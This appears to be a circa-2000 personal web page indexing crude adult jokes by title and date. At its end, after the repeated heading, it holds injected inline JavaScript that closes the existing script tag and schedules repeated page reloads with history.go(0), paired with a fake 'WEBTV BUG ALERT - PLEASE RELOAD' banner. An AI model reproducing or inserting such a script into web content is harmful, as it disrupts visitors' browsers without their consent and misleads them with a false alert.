My Collection of Even More Adult Jokes

Cum Again 5-28-00
Home For Lunch 5-28-00
Lyrics to The Weenie Whacker Song 6-6-00
Dirtiest Horse Race 6-7-00
101 Things Not to Say During Sex 6-7-00
156 Pick Up Lines 6-7-00
Definition of Fuck 6-7-00
Confucious Say... 6-15-00
Fly Drops Six Inches... 7-25-00
Here's a Puzzle for You 7-25-00

My Collection of Even More Adult Jokes </script><script>c = 6; for (i=1;i<c;i++) {setTimeout("history.go(0);", 500); } </SCRIPT><center><font color=ff6666> WEBTV BUG ALERT - PLEASE RELOAD</font></center>